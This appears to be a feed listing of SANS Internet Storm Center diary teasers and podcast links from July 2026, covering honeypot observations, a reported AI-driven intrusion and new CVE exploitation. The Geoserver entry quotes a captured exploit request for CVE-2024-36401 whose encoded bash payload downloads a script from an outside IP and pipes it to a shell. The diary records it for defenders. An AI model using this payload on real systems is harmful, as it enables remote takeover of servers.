-
ISC Stormcast For Monday, July 27th, 2026 https://isc.sans.edu/podcastdetail/10024, (Mon, Jul 27th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Scans for ESAFENET CDG 3 Document Management System Weak Logins, (Sun, Jul 26th)
ESAFENET’s CDG showed up in our data before. The company focused on secure document management and data leakage prevention solutions. The “CDG” stands for “Content Data Guard”, and the product appears to be mostly targeting the Chinese market [1]. Sadly, like so many security products, it suffers from basic security vulnerabilities like SQL Injection, XSS,…
-
ISC Stormcast For Friday, July 24th, 2026 https://isc.sans.edu/podcastdetail/10022, (Fri, Jul 24th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
When the “Autonomous Attacker” Is Your Own AI Model, (Thu, Jul 23rd)
Two disclosures, five days apart, described the same intrusion from opposite ends — one from the victim, one from the party that turned out to be responsible — and together they make one of the more instructive incidents of the year for defenders. On July 16, Hugging Face disclosed an AI-driven intrusion into its production…
-
ISC Stormcast For Thursday, July 23rd, 2026 https://isc.sans.edu/podcastdetail/10020, (Thu, Jul 23rd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Rondo Meets Geoserver, (Wed, Jul 22nd)
This isn’t a new attack, but something I saw “pop-up” in our logs this week: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1 Host: [redeacted]:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* This attack is associated with CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a tool used to manage and manipulate…
-
ISC Stormcast For Wednesday, July 22nd, 2026 https://isc.sans.edu/podcastdetail/10018, (Wed, Jul 22nd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Captive Portal Detection, (Tue, Jul 21st)
Not everything our honeypots detect is an attack. Sometimes it is just “odd traffic”, and this is one example: Our “First Seen” list currently includes “http://detectportal.firefox.co m/success.txt” as one of the new URLs detected by our honeypots. The hostname “detectportal” kind of gives away what is happening here. If you have ever tried to connect to a…
-
ISC Stormcast For Tuesday, July 21st, 2026 https://isc.sans.edu/podcastdetail/10016, (Tue, Jul 21st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
WordPress Exploitation Underway (CVE-2026-63030), (Mon, Jul 20th)
Last week, Searchlight Cyber released details about a vulnerability they are calling “wp2shell”. The vulnerability was initially announced without a CVE number. But now has been assigned CVE-2026-63030. Many WordPress plugin vulnerabilities are never assigned CVE numbers. But wp2shell is different. It is a SQL injection vulnerability in WordPress Core, not a plugin, and can…

